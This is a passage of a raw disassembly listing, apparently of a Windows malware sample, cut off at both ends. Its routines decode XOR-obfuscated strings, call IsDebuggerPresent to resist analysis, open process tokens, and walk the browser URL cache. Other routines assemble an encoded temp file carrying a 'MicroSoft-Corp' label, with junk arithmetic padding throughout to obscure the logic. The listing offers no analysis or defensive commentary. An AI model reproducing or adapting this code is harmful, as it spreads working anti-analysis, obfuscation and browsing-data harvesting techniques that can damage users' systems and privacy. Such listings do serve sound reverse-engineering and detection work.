add esp, 14h
mov ebx, eax
call sub_40C938 ; GetCurrentProcessId
add [ebp+var_C], ebx
mov eax, ebx
add eax, [ebp+var_8]
mov [ebp+var_8], eax
inc [ebp+var_4]
loc_40523C: ; CODE XREF: sub_405098+154�j
mov eax, [ebp+var_10]
cmp [ebp+var_4], eax
jb short loc_4051EE
pop edi
pop esi
pop ebx
leave
retn
sub_405098 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405249 proc near ; CODE XREF: sub_406073+24E�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_40524C: ; DATA XREF: sub_44057D�r
sub esp, 18h
push esi
loc_405250: ; DATA XREF: sub_440589�r
push edi
mov edi, 417Ah ; DATA XREF: sub_440595�r
mov eax, 43ABh ; DATA XREF: sub_4405A1�r
mul edi ; DATA XREF: sub_4405AD�r
mov [ebp+var_14], eax
loc_405260: ; DATA XREF: sub_4405B9�r
mov edi, eax
call sub_40C938 ; DATA XREF: sub_4405C5�r
mov esi, eax ; DATA XREF: sub_4405D1�r
push esi
push 0
loc_40526C: ; DATA XREF: sub_4405DD�r sub_4405E9�r
push 1F0FFFh
call sub_40CAA0 ; DATA XREF: sub_4405F5�r
mov esi, eax
loc_405278: ; DATA XREF: sub_440601�r
mov [ebp+var_3], 1Eh
loc_40527C: ; DATA XREF: sub_44060D�r
add [ebp+var_3], 1
loc_405280: ; DATA XREF: sub_440619�r
lea eax, [ebp+var_8]
push eax
loc_405284: ; DATA XREF: sub_440625�r
push 0F00FFh
push esi
call sub_40CD28 ; OpenProcessToken
push esi
loc_405290: ; DATA XREF: sub_440631�r
call sub_40C9B0 ; CloseHandle
mov esi, 1178h
mov eax, 787Ch ; DATA XREF: sub_44063D�r
mul esi
mov [ebp+var_18], eax
mov esi, eax
mov eax, dword_4422C8 ; DATA XREF: sub_4406F9�r
add eax, 3FF1h ; DATA XREF: sub_440705�r
loc_4052B0: ; DATA XREF: sub_440711�r
push eax
push 40h
call sub_40CA7C ; DATA XREF: sub_44071D�r
loc_4052B8: ; DATA XREF: sub_440729�r
mov edi, eax
mov [ebp+var_A], 5281h ; DATA XREF: sub_440735�r
loc_4052C0: ; DATA XREF: sub_440741�r
inc [ebp+var_A]
loc_4052C4: ; DATA XREF: sub_44074D�r
lea eax, [ebp+var_10]
push eax
loc_4052C8: ; DATA XREF: sub_440759�r sub_440765�r
mov eax, dword_4422C4
add eax, 3FFAh ; DATA XREF: sub_440771�r
push eax
push edi
loc_4052D4: ; DATA XREF: sub_44077D�r
push 1
push [ebp+var_8] ; DATA XREF: sub_440789�r
call sub_40CD34 ; DATA XREF: sub_440795�r
call sub_40C968 ; DATA XREF: sub_4407A1�r
push [ebp+arg_0] ; DATA XREF: sub_4407AD�r
push dword ptr [edi]
loc_4052E8: ; DATA XREF: sub_4407B9�r sub_4407C5�r
call sub_405098
add esp, 8
loc_4052F0: ; DATA XREF: sub_4407D1�r sub_4407DD�r
call sub_40C9D4 ; GetVersion
push edi
call sub_40CA88 ; DATA XREF: sub_4407E9�r
mov [ebp+var_2], 3CCh
movzx eax, [ebp+var_2] ; DATA XREF: sub_4407F5�r
mov edx, eax
add edx, eax ; DATA XREF: sub_440801�r
mov eax, edx
mov [ebp+var_2], ax ; DATA XREF: sub_44080D�r
push [ebp+var_8] ; DATA XREF: sub_440819�r
call sub_40C9B0 ; DATA XREF: sub_440825�r
pop edi
loc_405318: ; DATA XREF: sub_440831�r
pop esi
leave
retn
sub_405249 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40531B proc near ; CODE XREF: sub_405415+66�p
; sub_405415+F8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
loc_40531C: ; DATA XREF: sub_44083D�r
mov ebp, esp
push ecx
push eax
loc_405320: ; DATA XREF: sub_440849�r
push esi
push edi
mov esi, [ebp+arg_4] ; DATA XREF: sub_440855�r
push esi
push [ebp+arg_0]
mov eax, dword_4422E4
lea eax, ds:419660h[eax] ; DATA XREF: sub_440861�r
; sub_44086D�r
push eax
call sub_40CE18 ; DATA XREF: sub_440879�r
add esp, 0Ch ; DATA XREF: sub_440885�r
mov [ebp+var_4], 127h ; DATA XREF: sub_440891�r sub_44089D�r
xor edi, edi
jmp short loc_405360 ; DATA XREF: sub_4408A9�r
; ---------------------------------------------------------------------------
loc_405349: ; CODE XREF: sub_40531B+47�j
; DATA XREF: sub_4408B5�r
mov eax, dword_4422E4
add eax, edi
loc_405350: ; DATA XREF: sub_4408C1�r sub_4408CD�r
lea eax, ds:419660h[eax]
movsx edx, byte ptr [eax] ; DATA XREF: sub_4408D9�r
xor edx, 10h
mov [eax], dl
inc edi
loc_405360: ; CODE XREF: sub_40531B+2C�j
cmp edi, esi
jl short loc_405349
loc_405364: ; DATA XREF: sub_4408E5�r sub_4408F1�r
mov [ebp+var_8], 12Ch
mov eax, dword_4422E4 ; DATA XREF: sub_4408FD�r
loc_405370: ; DATA XREF: sub_440909�r
add eax, esi
mov byte ptr ds:dword_419660[eax], 0 ; DATA XREF: sub_440915�r
; sub_440921�r
mov edi, dword_4422E4 ; DATA XREF: sub_44092D�r
loc_405380: ; DATA XREF: sub_440939�r
mov eax, edi
lea eax, [eax+esi+3] ; DATA XREF: sub_440945�r
mov dword_4422E4, eax ; DATA XREF: sub_440951�r
cmp eax, 0DFBh ; DATA XREF: sub_44095D�r
loc_405390: ; DATA XREF: sub_440969�r
jle short loc_405399
and dword_4422E4, 0 ; DATA XREF: sub_440975�r sub_440981�r
loc_405399: ; CODE XREF: sub_40531B:loc_405390�j
lea eax, dword_419660[edi]
pop edi
pop esi
leave
retn
sub_40531B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053A3 proc near ; CODE XREF: sub_4063C4+49E�p
; sub_4063C4+4BB�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push edi
call sub_40C9D4 ; GetVersion
call sub_40CA58 ; IsDebuggerPresent
push 0
push 80h
push 4
push 0
push 0
push 0C0000000h
push [ebp+arg_0]
call sub_40CAD0 ; CreateFileA
mov edi, eax
call sub_40C9D4 ; GetVersion
cmp edi, 0FFFFFFFFh
jnz short loc_4053DC
xor eax, eax
jmp short loc_405412
; ---------------------------------------------------------------------------
loc_4053DC: ; CODE XREF: sub_4053A3+33�j
call sub_40C938 ; GetCurrentProcessId
push 2
push 0
push 0
push edi
call sub_40CADC ; SetFilePointer
call sub_40C998 ; GetProcessHeap
push 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_40CB48 ; WriteFile
call sub_40C944 ; GetCurrentThreadId
push edi
call sub_40C9B0 ; CloseHandle
xor eax, eax
inc eax
loc_405412: ; CODE XREF: sub_4053A3+37�j
pop edi
leave
retn
sub_4053A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405415 proc near ; CODE XREF: sub_4063C4+40A�p
var_2F6C = dword ptr -2F6Ch
var_2F67 = byte ptr -2F67h
var_2F62 = byte ptr -2F62h
var_2F5C = byte ptr -2F5Ch
var_2F57 = byte ptr -2F57h
var_2F52 = byte ptr -2F52h
var_2F4A = word ptr -2F4Ah
var_2F48 = dword ptr -2F48h
var_2F43 = byte ptr -2F43h
var_1F44 = dword ptr -1F44h
var_1F40 = byte ptr -1F40h
var_1F3C = dword ptr -1F3Ch
var_1F38 = dword ptr -1F38h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2F6Ch
call sub_40C8BC
push ebx
push esi
push edi
mov [ebp+var_2F48], 74C6h
sub [ebp+var_2F48], 450h
lea edi, [ebp+var_2F52]
lea esi, a9jA5_4 ; "9J`A5.4"
movsd
movsd
mov ebx, 6B02h
sub ebx, 5E65h
push [ebp+arg_0]
lea eax, [ebp+var_2F43]
push eax
call sub_40C8DC
lea edi, [ebp+var_2F57]
lea esi, aU ; ",U >"
mov ecx, 5
rep movsb
push 1
push offset asc_4473C7 ; "/"
call sub_40531B
mov edi, 7
sub edi, dword_4422DC
push edi
push eax
lea edi, [ebp+var_2F43]
push edi
call sub_401883
add esp, 14h
mov edi, eax
mov [ebp+var_2F4A], di
lea edi, [ebp+var_2F5C]
lea esi, aOOx ; "O%OX"
mov ecx, 5
rep movsb
movzx eax, [ebp+var_2F4A]
cmp eax, 0FFFFh
jz short loc_4054D5
movzx eax, [ebp+var_2F4A]
mov [ebp+eax+var_2F43], 0
loc_4054D5: ; CODE XREF: sub_405415+AF�j
lea edi, [ebp+var_2F62]
lea esi, aFqvm ; "fqVM&"
mov ecx, 3
rep movsw
mov [ebp+var_1F44], 1F40h
lea edi, [ebp+var_2F67]
lea esi, dword_442304
mov ecx, 5
rep movsb
push 3
push offset asc_4473C3 ; ":>:"
call sub_40531B
add esp, 8
lea edi, [ebp+var_1F44]
push edi
lea edi, [ebp+var_1F40]
push edi
push eax
call sub_40BE3C ; FindFirstUrlCacheEntryA
mov ebx, eax
or eax, eax
jz loc_4055F2
call sub_40C998 ; GetProcessHeap
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40CDE8
add esp, 8
or eax, eax
jnz short loc_40557C
lea edi, [ebp+var_2F6C]
lea esi, aWvyj ; "wvyJ"
mov ecx, 5
rep movsb
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C8DC
call sub_40CA58 ; IsDebuggerPresent
xor eax, eax
inc eax
jmp short loc_4055F2
; ---------------------------------------------------------------------------
loc_40557C: ; CODE XREF: sub_405415+13A�j
; sub_405415:loc_4055EE�j
call sub_40C998 ; GetProcessHeap
mov [ebp+var_1F44], 1F40h
call sub_40C968 ; RtlGetLastWin32Error
lea eax, [ebp+var_1F44]
push eax
lea eax, [ebp+var_1F40]
push eax
push ebx
call sub_40BE48 ; FindNextUrlCacheEntryA
or eax, eax
jz short loc_4055F0
mov [ebp+var_2F6C], 1B2Ch
inc [ebp+var_2F6C]
lea eax, [ebp+var_2F43]
push eax
push [ebp+var_1F3C]
call sub_40CDE8
add esp, 8
or eax, eax
jnz short loc_4055EE
call sub_40C9D4 ; GetVersion
push [ebp+var_1F38]
push [ebp+arg_4]
call sub_40C8DC
call sub_40C9C8 ; GetTickCount
xor eax, eax
inc eax
jmp short loc_4055F2
; ---------------------------------------------------------------------------
loc_4055EE: ; CODE XREF: sub_405415+1BA�j
jmp short loc_40557C
; ---------------------------------------------------------------------------
loc_4055F0: ; CODE XREF: sub_405415+191�j
xor eax, eax
loc_4055F2: ; CODE XREF: sub_405415+118�j
; sub_405415+165�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_405415 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4055F7 proc near ; CODE XREF: sub_4056CB+5AC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov ax, word_44230E
mov [ebp+var_E], ax
push ebx
call sub_40CB60 ; lstrlen
mov [ebp+var_8], eax
call sub_40C938 ; GetCurrentProcessId
mov edi, [ebp+var_8]
shl edi, 1
add edi, 8
push edi
push 40h
call sub_40CA7C ; LocalAlloc
mov [ebp+var_C], eax
call sub_40C944 ; GetCurrentThreadId
xor esi, esi
jmp short loc_40564D
; ---------------------------------------------------------------------------
loc_405637: ; CODE XREF: sub_4055F7+59�j
movzx eax, byte ptr [ebx+esi]
xor eax, 71h
or eax, eax
jz short loc_40564C
movzx eax, byte ptr [ebx+esi]
xor eax, 71h
mov [ebx+esi], al
loc_40564C: ; CODE XREF: sub_4055F7+49�j
inc esi
loc_40564D: ; CODE XREF: sub_4055F7+3E�j
cmp esi, [ebp+var_8]
jb short loc_405637
call sub_40CA58 ; IsDebuggerPresent
mov [ebp+var_2], 0
jmp short loc_4056B5
; ---------------------------------------------------------------------------
loc_40565F: ; CODE XREF: sub_4055F7+C5�j
push 6
push offset a5c5s5s ; "5c5s5s"
call sub_40531B
mov [ebp+var_14], eax
movzx edi, [ebp+var_2]
movzx edi, byte ptr [ebx+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_18], edx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_C]
push edi
mov esi, [ebp+var_14]
push esi
push edi
call sub_40CE54
add esp, 1Ch
inc [ebp+var_2]
loc_4056B5: ; CODE XREF: sub_4055F7+66�j
movzx eax, [ebp+var_2]
cmp eax, [ebp+var_8]
jb short loc_40565F
call sub_40C938 ; GetCurrentProcessId
mov eax, [ebp+var_C]
pop edi
pop esi
pop ebx
leave
retn
sub_4055F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4056CB proc near ; CODE XREF: sub_4063C4+155�p
var_300A4 = dword ptr -300A4h
var_300A0 = dword ptr -300A0h
var_3009C = dword ptr -3009Ch
var_30098 = dword ptr -30098h
var_30091 = byte ptr -30091h
var_30090 = dword ptr -30090h
var_3008C = dword ptr -3008Ch
var_30088 = dword ptr -30088h
var_30084 = dword ptr -30084h
var_30080 = dword ptr -30080h
var_3007C = dword ptr -3007Ch
var_30078 = dword ptr -30078h
var_30072 = byte ptr -30072h
var_3006D = byte ptr -3006Dh
var_3006A = byte ptr -3006Ah
var_30069 = byte ptr -30069h
var_30066 = word ptr -30066h
var_30064 = byte ptr -30064h
var_30061 = byte ptr -30061h
var_30060 = byte ptr -30060h
var_3005A = byte ptr -3005Ah
var_30054 = word ptr -30054h
var_30052 = word ptr -30052h
var_30050 = dword ptr -30050h
var_30049 = byte ptr -30049h
var_30048 = dword ptr -30048h
var_30044 = dword ptr -30044h
var_3003F = byte ptr -3003Fh
var_3003E = byte ptr -3003Eh
var_3003D = byte ptr -3003Dh
var_30033 = byte ptr -30033h
var_30029 = byte ptr -30029h
var_30028 = dword ptr -30028h
var_30022 = word ptr -30022h
var_30020 = dword ptr -30020h
var_30019 = byte ptr -30019h
var_30018 = word ptr -30018h
var_30015 = byte ptr -30015h
var_30014 = dword ptr -30014h
var_30010 = dword ptr -30010h
var_3000C = byte ptr -3000Ch
var_2000C = dword ptr -2000Ch
var_20008 = dword ptr -20008h
var_20003 = byte ptr -20003h
var_10004 = dword ptr -10004h
var_10000 = byte ptr -10000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 300A4h
call sub_40C8BC
push ebx
push esi
push edi
mov [ebp+var_30022], 1210h
add [ebp+var_30022], 4A18h
and [ebp+var_30020], 0
call sub_40C9D4 ; GetVersion
and [ebp+var_2000C], 0
and [ebp+var_30014], 0
lea eax, [ebp+var_10004]
push eax
push [ebp+arg_4]
call sub_401AF1
add esp, 8
mov ebx, eax
call sub_40C998 ; GetProcessHeap
mov eax, [ebp+var_10004]
or eax, eax
jz short loc_405733
or ebx, ebx
jz short loc_405733
cmp [ebp+arg_14], eax
jb short loc_405764
loc_405733: ; CODE XREF: sub_4056CB+5D�j
; sub_4056CB+61�j
mov [ebp+var_3006D], 37h
sub [ebp+var_3006D], 87h
push ebx
call sub_40CA88 ; LocalFree
lea edi, [ebp+var_30072]
lea esi, aEq ; "`EQ-"
mov ecx, 5
rep movsb
mov [ebp+var_30020], 1
loc_405764: ; CODE XREF: sub_4056CB+66�j
push [ebp+arg_C]
call sub_40CB60 ; lstrlen
mov [ebp-30070h], eax
mov eax, 64h
mul [ebp+var_10004]
mov [ebp-30074h], eax
mov edi, [ebp-30070h]
imul edi, [ebp-30070h], 32h
mov esi, [ebp-30074h]
lea edi, [esi+edi+1000h]
push edi
push 40h
call sub_40CA7C ; LocalAlloc
mov [ebp+var_20008], eax
mov ax, word_442315
mov [ebp+var_30052], ax
mov ax, word_442317
mov [ebp+var_30054], ax
push [ebp+arg_0]
push 104h
call sub_40C9BC ; GetTempPathA
mov [ebp+var_30029], 14h
add [ebp+var_30029], 42h
mov eax, [ebp+arg_0]
mov [ebp+var_30078], eax
mov ecx, eax
or eax, 0FFFFFFFFh
loc_4057EE: ; CODE XREF: sub_4056CB+128�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4057EE
mov edi, eax
mov esi, 12h
sub esi, dword_4422E0
push esi
mov esi, [ebp+var_30078]
add esi, edi
push esi
call sub_401777
add esp, 8
call sub_40C9D4 ; GetVersion
push 4
push offset aXd ; ">xd}"
call sub_40531B
add esp, 8
push eax
push [ebp+arg_0]
call sub_40CE78
add esp, 8
call sub_40C944 ; GetCurrentThreadId
lea edi, [ebp+var_3005A]
lea esi, aQbj8 ; "qj>8"
mov ecx, 6
rep movsb
push 6
push offset aXd_ ; ",xd}|."
call sub_40531B
add esp, 8
push eax
push [ebp+var_20008]
call sub_404A48
add esp, 8
lea edi, [ebp+var_30060]
lea esi, aWfzvk ; "WfZvk"
mov ecx, 6
rep movsb
push 6
push offset aXuqt_ ; ",xuqt."
call sub_40531B
add esp, 8
push eax
push [ebp+var_20008]
call sub_404A48
add esp, 8
push 13h
push offset aDydU_5c5e?dydU ; ",dyd|u.5c5e,?dyd|u."
call sub_40531B
add esp, 8
push [ebp+arg_1C]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CE54
add esp, 10h
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404A48
add esp, 8
call sub_40C968 ; RtlGetLastWin32Error
push 7
push offset a?xuqt_ ; ",?xuqt."
call sub_40531B
add esp, 8
push eax
push [ebp+var_20008]
call sub_404A48
add esp, 8
push 6
push offset byte_447377
call sub_40531B
add esp, 8
push eax
push [ebp+var_20008]
call sub_404A48
add esp, 8
call sub_40C9D4 ; GetVersion
lea edi, [ebp+var_30061]
lea esi, byte_442325
mov ecx, 1
rep movsb
push 5
push offset aV5E ; "v5>#e"
call sub_40531B
add esp, 8
mov [ebp+var_3007C], eax
call sub_40CE3C
mov ecx, 3E8h
cdq
idiv ecx
push edx
mov edi, [ebp+var_3007C]
push [ebp+var_3007C]
lea edi, [ebp+var_30033]
push edi
call sub_40CE54
add esp, 0Ch
push 2Ah
push offset word_447346
call sub_40531B
add esp, 8
lea edi, [ebp+var_30033]
push edi
push [ebp+arg_8]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CE54
add esp, 10h
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404A48
add esp, 8
call sub_40C998 ; GetProcessHeap
push 2Dh
push offset dword_447318
call sub_40531B
add esp, 8
mov [ebp+var_30080], eax
call sub_40CE3C
mov ecx, 9
cdq
idiv ecx
mov edi, edx
add edi, 14h
push edi
mov edi, [ebp+var_30080]
push [ebp+var_30080]
lea edi, [ebp+var_20003]
push edi
call sub_40CE54
add esp, 0Ch
mov [ebp+var_30015], 7Bh
loc_4059FB: ; DATA XREF: .data:off_446ACE�o
movzx eax, [ebp+var_30015]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_30015], al
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404A48
add esp, 8
cmp [ebp+var_30020], 0
jnz loc_405D50
call sub_40C998 ; GetProcessHeap
cmp [ebp+arg_18], 0
jz loc_405BC9
lea edi, [ebp+var_3008C+2]
lea esi, a9osO ; "9Os,O"
mov ecx, 3
rep movsw
and [ebp+var_30084], 0
jmp loc_405BAC
; ---------------------------------------------------------------------------
loc_405A5F: ; CODE XREF: sub_4056CB+4ED�j
call sub_40CA58 ; IsDebuggerPresent
mov [ebp+var_10000], 0
mov [ebp+var_30091], 40h
movzx eax, [ebp+var_30091]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_30091], al
and [ebp+var_30090], 0
jmp loc_405B4E
; ---------------------------------------------------------------------------
loc_405A91: ; CODE XREF: sub_4056CB+48D�j
mov [ebp+var_3009C], 64Bh
add [ebp+var_3009C], 2E2Ah
mov eax, [ebp+var_30084]
add eax, [ebp+var_30090]
cmp eax, [ebp+var_10004]
jnb loc_405B5E
call sub_40C968 ; RtlGetLastWin32Error
push 6
push offset a5c5s5s ; "5c5s5s"
call sub_40531B
mov [ebp+var_300A0], eax
mov edi, [ebp+var_30084]
add edi, [ebp+var_30090]
movzx edi, byte ptr [ebx+edi]
mov eax, edi
mov ecx, 1Ah
cdq
idiv ecx
mov esi, edx
add esi, 61h
push esi
mov eax, edi
mov ecx, 1Ah
mov edx, 4EC4EC4Fh
mul edx
shr edx, 3
mov [ebp+var_300A4], edx
mov edi, edx
add edi, 61h
push edi
lea edi, [ebp+var_10000]
push edi
mov edi, [ebp+var_300A0]
push edi
lea edi, [ebp+var_10000]
push edi
call sub_40CE54
add esp, 1Ch
mov [ebp+var_30098], 949h
mov eax, [ebp+var_30098]
mov edx, eax
add edx, eax
mov [ebp+var_30098], edx
inc [ebp+var_30090]
loc_405B4E: ; CODE XREF: sub_4056CB+3C1�j
cmp [ebp+var_30090], 80h
jb loc_405A91
loc_405B5E: ; CODE XREF: sub_4056CB+3EC�j
push 30h
push offset byte_4472E7
call sub_40531B
push [ebp+var_2000C]
push [ebp+arg_10]
lea edi, [ebp+var_10000]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CE54
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404A48
add esp, 24h
add [ebp+var_30084], 80h
inc [ebp+var_2000C]
loc_405BAC: ; CODE XREF: sub_4056CB+38F�j
mov eax, [ebp+var_10004]
cmp [ebp+var_30084], eax
jb loc_405A5F
mov [ebp+var_30014], eax
jmp loc_405D50
; ---------------------------------------------------------------------------
loc_405BC9: ; CODE XREF: sub_4056CB+36E�j
call sub_40C968 ; RtlGetLastWin32Error
mov eax, [ebp+arg_14]
mov [ebp+var_10004], eax
jmp loc_405D2C
; ---------------------------------------------------------------------------
loc_405BDC: ; CODE XREF: sub_4056CB+67F�j
call sub_40C968 ; RtlGetLastWin32Error
cmp [ebp+var_10000], 0
jz loc_405D2C
mov eax, [ebp+arg_14]
add eax, 0C800h
cmp [ebp+var_10004], eax
jnb loc_405D50
call sub_40C944 ; GetCurrentThreadId
mov eax, [ebp+var_10004]
mov [ebp+var_30014], eax
push 3
push offset a5cl ; "5cl"
call sub_40531B
push [ebp+arg_C]
push eax
lea edi, [ebp+var_3000C]
push edi
call sub_40CE54
add esp, 14h
lea ecx, [ebp+var_3000C]
or eax, 0FFFFFFFFh
loc_405C3B: ; CODE XREF: sub_4056CB+575�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_405C3B
mov edi, eax
mov word ptr [ebp+var_3008C], di
call sub_40C998 ; GetProcessHeap
lea eax, [ebp+var_10000]
push eax
movzx eax, word ptr [ebp+var_3008C]
lea eax, [ebp+eax+var_3000C]
push eax
call sub_40C8DC
call sub_40C968 ; RtlGetLastWin32Error
lea eax, [ebp+var_3000C]
push eax
call sub_4055F7
add esp, 4
mov [ebp+var_30010], eax
mov byte ptr [ebp+var_30088+3], 0F3h
sub byte ptr [ebp+var_30088+3], 0AFh
push 30h
push offset byte_4472E7
call sub_40531B
add esp, 8
push [ebp+var_2000C]
push [ebp+arg_10]
push [ebp+var_30010]
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CE54
add esp, 14h
mov word ptr [ebp+var_30088], 423Dh
movzx eax, word ptr [ebp+var_30088]
imul eax, 6872h
mov word ptr [ebp+var_30088], ax
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_404A48
add esp, 8
mov byte ptr [ebp+var_3008C+3], 2Dh
add byte ptr [ebp+var_3008C+3], 6Dh
push [ebp+var_30010]
call sub_40CA88 ; LocalFree
mov [ebp+var_30084], 96Ah
mov eax, [ebp+var_30084]
mov edx, eax
add edx, eax
mov [ebp+var_30084], edx
inc [ebp+var_2000C]
loc_405D2C: ; CODE XREF: sub_4056CB+50C�j
; sub_4056CB+51D�j
lea eax, [ebp+var_10000]
push eax
push [ebp+var_10004]
push ebx
call sub_401C68
add esp, 0Ch
mov [ebp+var_10004], eax
or eax, eax
jnz loc_405BDC
loc_405D50: ; CODE XREF: sub_4056CB+35F�j
; sub_4056CB+4F9�j ...
push 1Eh
push offset aYEd0diU2cerYd2 ; ",y~`ed0di`u-2cer}yd20fq|eu-77."
call sub_40531B
push eax
push [ebp+var_20008]
call sub_404A48
mov [ebp+var_30018], 586Ch
movzx eax, [ebp+var_30018]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_30018], ax
push 7
push offset dword_4472BC
call sub_40531B
push eax
push [ebp+var_20008]
call sub_404A48
push 8
push offset aCsbyD_ ; ",csby`d."
call sub_40531B
push eax
push [ebp+var_20008]
call sub_40472A
mov [ebp+var_30019], 0F3h
movzx eax, [ebp+var_30019]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_30019], al
lea edi, [ebp+var_30064]
lea esi, aI? ; "i?"
mov ecx, 3
rep movsb
push 6
push offset a5s5E ; "5s5>\"e"
call sub_40531B
mov [ebp+var_30084], eax
call sub_40CE3C
mov [ebp+var_30088], eax
call sub_40CE3C
mov ecx, 63h
cdq
idiv ecx
push edx
mov edi, [ebp+var_30088]
mov eax, edi
mov ecx, 14h
cdq
idiv ecx
mov edi, edx
add edi, 61h
push edi
mov edi, [ebp+var_30084]
push edi
lea edi, [ebp+var_3003D]
push edi
call sub_40CE54
mov [ebp+var_3003E], 75h
add [ebp+var_3003E], 10h
push 0Eh
push offset byte_44729D
call sub_40531B
lea edi, [ebp+var_3003D]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CE54
mov [ebp+var_3003F], 0C7h
add [ebp+var_3003F], 0Dh
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40472A
push 15h
push offset byte_447287
call sub_40531B
lea edi, [ebp+var_30033]
push edi
push eax
lea edi, [ebp+var_20003]
push edi
call sub_40CE54
mov ax, word_44232F
mov [ebp+var_30066], ax
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40472A
lea edi, [ebp+var_30069]
lea esi, byte_442331
mov ecx, 3
rep movsb
push 1
push offset byte_447285
call sub_40531B
push eax
push [ebp+var_20008]
call sub_40472A
mov [ebp+var_30044], 2BB7h
inc [ebp+var_30044]
push 16h
push offset word_44726E
call sub_40531B
mov [ebp+var_3008C], eax
call sub_40CE3C
mov ecx, 3E8h
cdq
idiv ecx
mov edi, edx
add edi, 2710h
push edi
lea edi, [ebp+var_3003D]
push edi
mov edi, [ebp+var_3008C]
push edi
lea edi, [ebp+var_20003]
push edi
call sub_40CE54
mov [ebp+var_30048], 24FBh
add [ebp+var_30048], 6063h
lea eax, [ebp+var_20003]
push eax
push [ebp+var_20008]
call sub_40472A
mov [ebp+var_30049], 0F4h
sub [ebp+var_30049], 0C6h
push 9
push offset a?csbyD_ ; ",?csby`d."
call sub_40531B
push eax
push [ebp+var_20008]
call sub_404A48
call sub_40C938 ; GetCurrentProcessId
push 7
push offset dword_44725C
call sub_40531B
push eax
push [ebp+var_20008]
call sub_404A48
push 7
push offset a?xd_ ; ",?xd}|."
call sub_40531B
push eax
push [ebp+var_20008]
call sub_40CE78
lea edi, [ebp+var_3006A]
lea esi, byte_442334
xor ecx, ecx
inc ecx
rep movsb
push [ebp+arg_0]
call sub_403530
add esp, 0E4h
mov [ebp+var_30050], 5527h
sub [ebp+var_30050], 0A57h
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+arg_0]
call sub_40CAD0 ; CreateFileA
mov [ebp+var_30028], eax
call sub_40C998 ; GetProcessHeap
push [ebp+var_20008]
call sub_40CB60 ; lstrlen
push 0
lea edi, [ebp+var_2000C]
push edi
push eax
push [ebp+var_20008]
push [ebp+var_30028]
call sub_40CB48 ; WriteFile
push [ebp+var_30028]
call sub_40C9B0 ; CloseHandle
push [ebp+var_20008]
call sub_40CA88 ; LocalFree
cmp [ebp+var_30020], 0
jnz short loc_406063
push ebx
call sub_40CA88 ; LocalFree
jmp short loc_406068
; ---------------------------------------------------------------------------
loc_406063: ; CODE XREF: sub_4056CB+98E�j
or eax, 0FFFFFFFFh
jmp short loc_40606E
; ---------------------------------------------------------------------------
loc_406068: ; CODE XREF: sub_4056CB+996�j
mov eax, [ebp+var_30014]
loc_40606E: ; CODE XREF: sub_4056CB+99B�j
pop edi
pop esi
pop ebx
leave
retn
sub_4056CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406073 proc near ; CODE XREF: sub_4063C4:loc_4064CB�p
var_2114 = word ptr -2114h
var_2112 = byte ptr -2112h
var_1113 = byte ptr -1113h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = word ptr -110h
var_10E = byte ptr -10Eh
var_10D = byte ptr -10Dh
var_108 = dword ptr -108h
var_101 = byte ptr -101h
var_100 = byte ptr -100h
push ebp
mov ebp, esp
mov eax, 2114h
call sub_40C8BC
push ebx
push esi
push edi
lea edi, [ebp+var_10D]
